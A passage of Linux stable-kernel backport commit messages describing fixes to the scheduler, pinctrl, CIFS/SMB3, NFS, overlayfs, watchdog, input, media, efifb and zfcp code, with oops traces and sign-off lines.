what it could expect.
( This situation can be detected with /proc/sched_debug. The ".tg_load_avg"
of the task group will be much higher than sum of ".tg_load_avg_contrib"
of online cfs_rqs of the task group. )
The load of group entities don't have to be intialized to something else
than 0 because their load will increase when an entity is attached.
Reported-by: Joseph Salisbury <joseph.salisbury@canonical.com>
Tested-by: Dietmar Eggemann <dietmar.eggemann@arm.com>
Signed-off-by: Vincent Guittot <vincent.guittot@linaro.org>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: joonwoop@codeaurora.org
Fixes: 3d30544f02 ("sched/fair: Apply more PELT fixes)
Link: http://lkml.kernel.org/r/1476881123-10159-1-git-send-email-vincent.guittot@linaro.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a171bc51fa upstream.
Initialize the spinlock before using it.
INFO: trying to register non-static key.
the code is fine but needs lockdep annotation.
turning off the locking correctness validator.
CPU: 2 PID: 1 Comm: swapper/0 Not tainted 4.8.0-dwc-bisect #4
Hardware name: Intel Corp. VALLEYVIEW C0 PLATFORM/BYT-T FFD8, BIOS BLAKFF81.X64.0088.R10.1403240443 FFD8_X64_R_2014_13_1_00 03/24/2014
0000000000000000 ffff8800788ff770 ffffffff8133d597 0000000000000000
0000000000000000 ffff8800788ff7e0 ffffffff810cfb9e 0000000000000002
ffff8800788ff7d0 ffffffff8205b600 0000000000000002 ffff8800788ff7f0
Call Trace:
[<ffffffff8133d597>] dump_stack+0x67/0x90
[<ffffffff810cfb9e>] register_lock_class+0x52e/0x540
[<ffffffff810d2081>] __lock_acquire+0x81/0x16b0
[<ffffffff810cede1>] ? save_trace+0x41/0xd0
[<ffffffff810d33b2>] ? __lock_acquire+0x13b2/0x16b0
[<ffffffff810cf05a>] ? __lock_is_held+0x4a/0x70
[<ffffffff810d3b1a>] lock_acquire+0xba/0x220
[<ffffffff8136f1fe>] ? byt_gpio_get_direction+0x3e/0x80
[<ffffffff81631567>] _raw_spin_lock_irqsave+0x47/0x60
[<ffffffff8136f1fe>] ? byt_gpio_get_direction+0x3e/0x80
[<ffffffff8136f1fe>] byt_gpio_get_direction+0x3e/0x80
[<ffffffff813740a9>] gpiochip_add_data+0x319/0x7d0
[<ffffffff81631723>] ? _raw_spin_unlock_irqrestore+0x43/0x70
[<ffffffff8136fe3b>] byt_pinctrl_probe+0x2fb/0x620
[<ffffffff8142fb0c>] platform_drv_probe+0x3c/0xa0
...
Based on the diff it looks like the problem was introduced in
commit 71e6ca61e8 ("pinctrl: baytrail: Register pin control handling")
but I wasn't able to verify that empirically as the parent commit
just oopsed when I tried to boot it.
Cc: Cristina Ciocan <cristina.ciocan@intel.com>
Fixes: 71e6ca61e8 ("pinctrl: baytrail: Register pin control handling")
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c538b94367 upstream.
Dell XPS 13 (and maybe some others) uses a GPIO (CPU_GP_1) during suspend
to explicitly disable USB touchscreen interrupt. This is done to prevent
situation where the lid is closed the touchscreen is left functional.
The pinctrl driver (wrongly) assumes it owns all pins which are owned by
host and not locked down. It is perfectly fine for BIOS to use those pins
as it is also considered as host in this context.
What happens is that when the lid of Dell XPS 13 is closed, the BIOS
configures CPU_GP_1 low disabling the touchscreen interrupt. During resume
we restore all host owned pins to the known state which includes CPU_GP_1
and this overwrites what the BIOS has programmed there causing the
touchscreen to fail as no interrupts are reaching the CPU anymore.
Fix this by restoring only those pins we know are explicitly requested by
the kernel one way or other.
Link: https://bugzilla.kernel.org/show_bug.cgi?id=176361
Reported-by: AceLan Kao <acelan.kao@canonical.com>
Tested-by: AceLan Kao <acelan.kao@canonical.com>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit caef78b6cd upstream.
Some time ago, we brought our UV BIOS callback code up to speed with the
new EFI memory mapping scheme, in commit:
d1be84a232 ("x86/uv: Update uv_bios_call() to use efi_call_virt_pointer()")
By leveraging some changes that I made to a few of the EFI runtime
callback mechanisms, in commit:
80e7559607 ("efi: Convert efi_call_virt() to efi_call_virt_pointer()")
This got everything running smoothly on UV, with the new EFI mapping
code. However, this left one, small loose end, in that EFI_OLD_MEMMAP
(a.k.a. efi=old_map) will no longer work on UV, on kernels that include
the aforementioned changes.
At the time this was not a major issue (in fact, it still really isn't),
but there's no reason that EFI_OLD_MEMMAP *shouldn't* work on our
systems. This commit adds a check into uv_bios_call(), to see if we have
the EFI_OLD_MEMMAP bit set in efi.flags. If it is set, we fall back to
using our old callback method, which uses efi_call() directly on the __va()
of our function pointer.
Signed-off-by: Alex Thorlton <athorlton@sgi.com>
Acked-by: Matt Fleming <matt@codeblueprint.co.uk>
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Brian Gerst <brgerst@gmail.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Cc: Dimitri Sivanich <sivanich@sgi.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Josh Poimboeuf <jpoimboe@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Masahiro Yamada <yamada.masahiro@socionext.com>
Cc: Mike Travis <travis@sgi.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Russ Anderson <rja@sgi.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: linux-efi@vger.kernel.org
Link: http://lkml.kernel.org/r/1476928131-170101-1-git-send-email-athorlton@sgi.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 24df1483c2 upstream.
Cleanup some missing mem frees on some cifs ioctls, and
clarify others to make more obvious that no data is returned.
Signed-off-by: Steve French <smfrench@gmail.com>
Acked-by: Sachin Prabhu <sprabhu@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18dd8e1a65 upstream.
[CIFS] We had cases where we sent a SMB2/SMB3 setinfo request with all
timestamp (and DOS attribute) fields marked as 0 (ie do not change)
e.g. on chmod or chown.
Signed-off-by: Steve French <steve.french@primarydata.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9742805d6b upstream.
In debugging smb3, it is useful to display the number
of credits available, so we can see when the server has not granted
sufficient operations for the client to make progress, or alternatively
the client has requested too many credits (as we saw in a recent bug)
so we can compare with the number of credits the server thinks
we have.
Add a /proc/fs/cifs/DebugData line to display the client view
on how many credits are available.
Signed-off-by: Steve French <steve.french@primarydata.com>
Reported-by: Germano Percossi <germano.percossi@citrix.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3afca265b5 upstream.
Remove the global file_list_lock to simplify cifs/smb3 locking and
have spinlocks that more closely match the information they are
protecting.
Add new tcon->open_file_lock and file->file_info_lock spinlocks.
Locks continue to follow a heirachy,
cifs_socket --> cifs_ses --> cifs_tcon --> cifs_file
where global tcp_ses_lock still protects socket and cifs_ses, while the
the newer locks protect the lower level structure's information
(tcon and cifs_file respectively).
Signed-off-by: Steve French <steve.french@primarydata.com>
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Reviewed-by: Aurelien Aptel <aaptel@suse.com>
Reviewed-by: Germano Percossi <germano.percossi@citrix.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 94f8737175 upstream.
When we open a durable handle we give a Globally Unique
Identifier (GUID) to the server which we must keep for later reference
e.g. when reopening persistent handles on reconnection.
Without this the GUID generated for a new persistent handle was lost and
16 zero bytes were used instead on re-opening.
Signed-off-by: Aurelien Aptel <aaptel@suse.com>
Signed-off-by: Steve French <smfrench@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7d414f396c upstream.
The kernel client requests 2 credits for many operations even though
they only use 1 credit (presumably to build up a buffer of credit).
Some servers seem to give the client as much credit as is requested. In
this case, the amount of credit the client has continues increasing to
the point where (server->credits * MAX_BUFFER_SIZE) overflows in
smb2_wait_mtu_credits().
Fix this by throttling the credit requests if an set limit is reached.
For async requests where the credit charge may be > 1, request as much
credit as what is charged.
The limit is chosen somewhat arbitrarily. The Windows client
defaults to 128 credits, the Windows server allows clients up to
512 credits (or 8192 for Windows 2016), and the NetApp server
(and at least one other) does not limit clients at all.
Choose a high enough value such that the client shouldn't limit
performance.
This behavior was seen with a NetApp filer (NetApp Release 9.0RC2).
Signed-off-by: Ross Lagerwall <ross.lagerwall@citrix.com>
Signed-off-by: Steve French <smfrench@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 89f39af129 upstream.
Change thaw_super() to check frozen != SB_FREEZE_COMPLETE rather than
frozen == SB_UNFROZEN, otherwise it can race with freeze_super() which
drops sb->s_umount after SB_FREEZE_WRITE to preserve the lock ordering.
In this case thaw_super() will wrongly call s_op->unfreeze_fs() before
it was actually frozen, and call sb_freeze_unlock() which leads to the
unbalanced percpu_up_write(). Unfortunately lockdep can't detect this,
so this triggers misc BUG_ON()'s in kernel/rcu/sync.c.
Reported-and-tested-by: Nikolay Borisov <kernel@kyup.com>
Signed-off-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7798bf2140 upstream.
On faulting sigreturn we do get SIGSEGV, all right, but anything
we'd put into pt_regs could end up in the coredump. And since
__copy_from_user() never zeroed on arc, we'd better bugger off
on its failure without copying random uninitialized bits of
kernel stack into pt_regs...
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cb96408da4 upstream.
SCTLR_EL2.SPAN bit controls what happens with the PSTATE.PAN bit on an
exception. However, this bit has no effect on the PSTATE.PAN when
HCR_EL2.E2H or HCR_EL2.TGE is unset. Thus when VHE is used and
exception taken from a guest PSTATE.PAN bit left unchanged and we
continue with a value guest has set.
To address that always reset PSTATE.PAN on entry from EL1.
Fixes: 1f364c8c48 ("arm64: VHE: Add support for running Linux in EL2 mode")
Signed-off-by: Vladimir Murzin <vladimir.murzin@arm.com>
Reviewed-by: James Morse <james.morse@arm.com>
Acked-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Christoffer Dall <christoffer.dall@linaro.org>
[ rebased for v4.7+ ]
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4d486e0083 upstream.
Commit 0e6e01ff69 ("CPM/QE: use genalloc to manage CPM/QE muram")
has changed the way muram is managed.
genalloc uses kmalloc(), hence requires the SLAB to be up and running.
On powerpc 8xx, cpm_reset() is called early during startup.
cpm_reset() then calls cpm_muram_init() before SLAB is available,
hence the following Oops.
cpm_reset() cannot be called during initcalls because the CPM is
needed for console.
This patch removes the call to cpm_muram_init() from cpm_reset().
cpm_muram_init() will be called from a new function called cpm_init()
which is declared as subsys_initcall, unless cpm_muram_alloc() is
called earlier for the serial console in which case cpm_muram_init()
will be called from there.
The reason for calling it from two places is that some drivers
(e.g. i2c-cpm) need some of the initialisations done by
cpm_muram_init() but don't call cpm_muram_alloc(). The console
driver calls cpm_muram_alloc() but some platforms might not use
the CPM serial ports for console.
[ 0.000000] Unable to handle kernel paging request for data at address 0x00000008
[ 0.000000] Faulting instruction address: 0xc01acce0
[ 0.000000] Oops: Kernel access of bad area, sig: 11 [#1]
[ 0.000000] PREEMPT CMPC885
[ 0.000000] CPU: 0 PID: 0 Comm: swapper Not tainted 4.4.14-g0886ed8 #5
[ 0.000000] task: c05183e0 ti: c0536000 task.ti: c0536000
[ 0.000000] NIP: c01acce0 LR: c0011068 CTR: 00000000
[ 0.000000] REGS: c0537e50 TRAP: 0300 Not tainted (4.4.14-s3k-dev-g0886ed8-svn)
[ 0.000000] MSR: 00001032 <ME,IR,DR,RI> CR: 28044428 XER: 00000000
[ 0.000000] DAR: 00000008 DSISR: c0000000
GPR00: c0011068 c0537f00 c05183e0 00000000 00009000 ffffffff 00000bc0 ffffffff
GPR08: ff003000 ff00b000 ff003bbf 00000000 22044422 100d43a8 00000000 07ff94e8
GPR16: 00000000 07bb5d70 00000000 07ff81f4 07ff81f4 07ff81f4 00000000 00000000
GPR24: 07ffb3a0 07fe7628 c0550000 c7ffa190 c0540000 ff003bbf 00000000 00000001
[ 0.000000] NIP [c01acce0] gen_pool_add_virt+0x14/0xdc
[ 0.000000] LR [c0011068] cpm_muram_init+0xd4/0x18c
[ 0.000000] Call Trace:
[ 0.000000] [c0537f00] [00000200] 0x200 (unreliable)
[ 0.000000] [c0537f20] [c0011068] cpm_muram_init+0xd4/0x18c
[ 0.000000] [c0537f70] [c0494684] cpm_reset+0xb4/0xc8
[ 0.000000] [c0537f90] [c0494c64] cmpc885_setup_arch+0x10/0x30
[ 0.000000] [c0537fa0] [c0493cd4] setup_arch+0x130/0x168
[ 0.000000] [c0537fb0] [c04906bc] start_kernel+0x88/0x380
[ 0.000000] [c0537ff0] [c0002224] start_here+0x38/0x98
[ 0.000000] Instruction dump:
[ 0.000000] 91430010 91430014 80010014 83e1000c 7c0803a6 38210010 4e800020 7c0802a6
[ 0.000000] 9421ffe0 bf61000c 90010024 7c7e1b78 <80630008> 7c9c2378 7cc31c30 3863001f
[ 0.000000] ---[ end trace dc8fa200cb88537f ]---
fixes: 0e6e01ff69 ("CPM/QE: use genalloc to manage CPM/QE muram")
Signed-off-by: Christophe Leroy <christophe.leroy@c-s.fr>
[scottwood: Removed some string changes unrelated to bugfix]
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5dc6f3fede upstream.
of_mm_gpiochip_add_data() calls mm_gc->save_regs() before
setting the data. Therefore ->save_regs() cannot use
gpiochip_get_data()
An Oops is encountered without this fix.
fixes: 1e714e54b5 ("powerpc: qe_lib-gpio: use gpiochip data pointer")
Signed-off-by: Christophe Leroy <christophe.leroy@c-s.fr>
Reviewed-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 35d04077ad upstream.
The definition of atomic_dec_if_positive() assumes that
atomic_sub_if_positive() exists, which is only the case if
metag specific atomics are used. This results in the following
build error when trying to build metag1_defconfig.
kernel/ucount.c: In function 'dec_ucount':
kernel/ucount.c:211: error:
implicit declaration of function 'atomic_sub_if_positive'
Moving the definition of atomic_dec_if_positive() into the metag
conditional code fixes the problem.
Fixes: 6006c0d8ce ("metag: Atomics, locks and bitops")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8355b3f944 upstream.
Commit 0254e95353 ("watchdog: Drop pointer to watchdog device from
struct watchdog_device") removed the dev pointer from struct
watchdog_device, but this driver was still assigning it, leading to
a compilation error:
drivers/watchdog/mt7621_wdt.c: In function 'mt7621_wdt_probe':
drivers/watchdog/mt7621_wdt.c:142:16: error:
'struct watchdog_device' has no member named 'dev'
Fix this by removing the assignment.
Fixes: 0254e95353 ("watchdog: Drop pointer to watchdog device ...")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Wim Van Sebroeck <wim@iguana.be>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit df9c692b56 upstream.
Commit 0254e95353 ("watchdog: Drop pointer to watchdog device from
struct watchdog_device") removed the dev pointer from struct
watchdog_device, but this driver was still assigning it, leading to a
compilation error:
drivers/watchdog/rt2880_wdt.c: In function ‘rt288x_wdt_probe’:
drivers/watchdog/rt2880_wdt.c:161:16: error: ‘struct watchdog_device’
has no member named ‘dev’
rt288x_wdt_dev.dev = &pdev->dev;
^
scripts/Makefile.build:289: recipe for target
'drivers/watchdog/rt2880_wdt.o' failed
Fix this by removing the assignment.
Fixes: 0254e95353 ("watchdog: Drop pointer to watchdog device ...")
Signed-off-by: Matt Redfearn <matt.redfearn@imgtec.com>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Wim Van Sebroeck <wim@iguana.be>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a3f9d1b58a upstream.
Commit 41963c10c4 sets the block layout's
last written byte to the offset of the end of the extent rather than the
end of the write which incorrectly updates the inode's size for
partial-page writes.
Fixes: 41963c10c4 ("pnfs/blocklayout: update last_write_offset atomically with extents")
Signed-off-by: Benjamin Coddington <bcodding@redhat.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Tested-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7dc72d5f7a upstream.
Due to inode number reuse in filesystems, we can end up corrupting the
inode on our client if we apply the file attributes without ensuring that
the filehandle matches.
Typical symptoms include spurious "mode changed" reports in the syslog.
We still do want to ensure that we don't invalidate the dentry if the
inode number matches, but we don't have a filehandle.
Fixes: fa9233699c ("NFS: Don't require a filehandle to refresh...")
Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Tested-by: Oleg Drokin <green@linuxhacker.ru>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1eca45f8a8 upstream.
By design notifier can be registered once only, however nfsd registers
the same inetaddr notifiers per net-namespace. When this happen it
corrupts list of notifiers, as result some notifiers can be not called
on proper event, traverse on list can be cycled forever, and second
unregister can access already freed memory.
fixes: 36684996 ("nfsd: Register callbacks on the inetaddr_chain and inet6addr_chain")
Signed-off-by: Vasily Averin <vvs@virtuozzo.com>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d48f9ce73c upstream.
Write space becoming available may race with putting the task to sleep
in xprt_wait_for_buffer_space(). The existing mechanism to avoid the
race does not work.
This (edited) partial trace illustrates the problem:
[1] rpc_task_run_action: task:43546@5 ... action=call_transmit
[2] xs_write_space <-xs_tcp_write_space
[3] xprt_write_space <-xs_write_space
[4] rpc_task_sleep: task:43546@5 ...
[5] xs_write_space <-xs_tcp_write_space
[1] Task 43546 runs but is out of write space.
[2] Space becomes available, xs_write_space() clears the
SOCKWQ_ASYNC_NOSPACE bit.
[3] xprt_write_space() attemts to wake xprt->snd_task (== 43546), but
this has not yet been queued and the wake up is lost.
[4] xs_nospace() is called which calls xprt_wait_for_buffer_space()
which queues task 43546.
[5] The call to sk->sk_write_space() at the end of xs_nospace() (which
is supposed to handle the above race) does not call
xprt_write_space() as the SOCKWQ_ASYNC_NOSPACE bit is clear and
thus the task is not woken.
Fix the race by resetting the SOCKWQ_ASYNC_NOSPACE bit in xs_nospace()
so the second call to sk->sk_write_space() calls xprt_write_space().
Suggested-by: Trond Myklebust <trondmy@primarydata.com>
Signed-off-by: David Vrabel <david.vrabel@citrix.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f9a703a54d upstream.
Just like Fujitsu CELSIUS H730, the H760 also has an Elantech touchpad with
the same quirks. Without this patch, the touchpad is useless out-of-the-box
as the mouse pointer won't move.
This patch makes the driver aware of both the crc_enabled=1 requirement and
the middle button, making the touchpad fully functional out-of-the-box.
Signed-off-by: Matti Kurkela <Matti.Kurkela@iki.fi>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 930e19248e upstream.
On suspend/resume cycle, selftest is executed to reset i8042 controller.
But when this is done in Asus devices, subsequent calls to detect/init
functions to elantech driver fails. Skipping selftest fixes this problem.
An easier step to reproduce this problem is adding i8042.reset=1 as a
kernel parameter. On Asus laptops, it'll make the system to start with the
touchpad already stuck, since psmouse_probe forcibly calls the selftest
function.
This patch was inspired by John Hiesey's change[1], but, since this problem
affects a lot of models of Asus, let's avoid running selftests on them.
All models affected by this problem:
A455LD
K401LB
K501LB
K501LX
R409L
V502LX
X302LA
X450LCP
X450LD
X455LAB
X455LDB
X455LF
Z450LA
[1]: https://marc.info/?l=linux-input&m=144312209020616&w=2
Fixes: "ETPS/2 Elantech Touchpad dies after resume from suspend"
(https://bugzilla.kernel.org/show_bug.cgi?id=107971)
Signed-off-by: Marcos Paulo de Souza <marcos.souza.org@gmail.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 034827c727 upstream.
The native ABI vDSO linker script vdso.lds is built by preprocessing
vdso.lds.S, with the native -mabi flag passed in to get the correct ABI
definitions. Unfortunately however certain toolchains choke on -mabi=64
without a corresponding compatible -march flag, for example:
cc1: error: ‘-march=mips32r2’ is not compatible with the selected ABI
scripts/Makefile.build:338: recipe for target 'arch/mips/vdso/vdso.lds' failed
Fix this by including ccflags-vdso in the KBUILD_CPPFLAGS for vdso.lds,
which includes the appropriate -march flag.
Fixes: ebb5e78cc6 ("MIPS: Initial implementation of a VDSO")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Reviewed-by: Maciej W. Rozycki <macro@imgtec.com>
Cc: linux-mips@linux-mips.org
Patchwork: https://patchwork.linux-mips.org/patch/14368/
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4875a5f721 upstream.
On a Dell laptop, there is no global adcs for all input devices, so
the input devices use the different adc, as a result, dyn_adc_switch
is set to true.
In this situation, it is safe to control the micmute led according to
user's choice of muting/unmuting the current input device, since only
current input device path is active, while other input device paths
are inactive and powered down.
Fixes: 00ef99408b ('ALSA: hda - add mic mute led hook for dell machines')
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 461af077d3 upstream.
The driver should not ignore errors while registering the I2C
bus, as this device can't even minimally work without the buses,
as it uses those buses internally to talk with the several IP
blocks inside the chip.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 24b923f073 upstream.
This device uses GPIOs: 28 to switch between analog and
digital modes: on digital mode, it should be set to 1.
The code that sets it on analog mode is OK, but it misses
the logic that sets it on digital mode.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1871d718a9 upstream.
The cx231xx_set_agc_analog_digital_mux_select() callers
expect it to return 0 or an error. Returning a positive value
makes the first attempt to switch between analog/digital to fail.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 505a0ea706 upstream.
With the current settings, only one channel locks properly.
That's likely because, when this driver was written, Brazil
were still using experimental transmissions.
Change it to reproduce the settings used by the newer drivers.
That makes it lock on other channels.
Tested with both PixelView SBTVD Hybrid (cx231xx-based) and
C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dafb65fb98 upstream.
On this frontend, it takes a while to start output normal
TS data. That only happens on state S9. On S8, the TS output
is enabled, but it is not reliable enough.
However, the zigzag loop is too fast to let it sync.
As, on practical tests, the zigzag software loop doesn't
seem to be helping, but just slowing down the tuning, let's
switch to hardware algorithm, as the tuners used on such
devices are capable of work with frequency drifts without
any help from software.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8b326c61de upstream.
Be defensive about what underlying fs provides us in the returned xattr
list buffer. strlen() may overrun the buffer, so use strnlen() and WARN if
the contents are not properly null terminated.
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a45b3628c upstream.
The function uses the memory address of a struct dentry as unique id.
While the address-based directory entry is only visible to root it is IMHO
still worth fixing since the temporary name does not have to be a kernel
address. It can be any unique number. Replace it by an atomic integer
which is allowed to wrap around.
Signed-off-by: Richard Weinberger <richard@nod.at>
Reviewed-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: e9be9d5e76 ("overlay filesystem")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d50b3f43db upstream.
When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).
The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.
With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").
Fixes: 7c83172b98 ("x86_64 EFI boot support: EFI frame buffer driver") # v2.6.24+
Signed-off-by: Max Staudt <mstaudt@suse.de>
Acked-By: Peter Jones <pjones@redhat.com>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e7cb08e894 upstream.
We accidentally overwrite the original saved value of "flags" so that we
can't re-enable IRQs at the end of the function. Presumably this
function is mostly called with IRQs disabled or it would be obvious in
testing.
Fixes: aceeffbb59 ("zfcp: trace full payload of all SAN records (req,resp,iels)")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit aceeffbb59 upstream.
This was lost with commit 2c55b750a8
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
but is necessary for problem determination, e.g. to see the
currently active zone set during automatic port scan.
For the large GPN_FT response (4 pages), save space by not dumping
any empty residual entries.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a8 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 94db3725f0 upstream.
commit 2c55b750a8
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
started to add FC_CT_HDR_LEN which made zfcp dump random data
out of bounds for RSPN GS responses because u.rspn.rsp
is the largest and last field in the union of struct zfcp_fc_req.
Other request/response types only happened to stay within bounds
due to the padding of the union or
due to the trace capping of u.gspn.rsp to ZFCP_DBF_SAN_MAX_PAYLOAD.
Timestamp : ...
Area : SAN
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : ...
Record id : 2
Tag : fsscth2
Request id : 0x...
Destination ID : 0x00fffffc
Payload short : 01000000 fc020000 80020000 00000000
xxxxxxxx xxxxxxxx xxxxxxxx xxxxxxxx <===
00000000 00000000 00000000 00000000
Payload length : 32 <===
struct zfcp_fc_req {
[0] struct zfcp_fsf_ct_els ct_els;
[56] struct scatterlist sg_req;
[96] struct scatterlist sg_rsp;
union {
struct {req; rsp;} adisc; SIZE: 28+28= 56
struct {req; rsp;} gid_pn; SIZE: 24+20= 44
struct {rspsg; req;} gpn_ft; SIZE: 40*4+20=180
struct {req; rsp;} gspn; SIZE: 20+273= 293
struct {req; rsp;} rspn; SIZE: 277+16= 293
[136] } u;
}
SIZE: 432
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a8 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 771bf03537 upstream.
With commit 2c55b750a8
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
we lost the N_Port-ID where an ELS response comes from.
With commit 7c7dc19681
("[SCSI] zfcp: Simplify handling of ct and els requests")
we lost the N_Port-ID where a CT response comes from.
It's especially useful if the request SAN trace record
with D_ID was already lost due to trace buffer wrap.
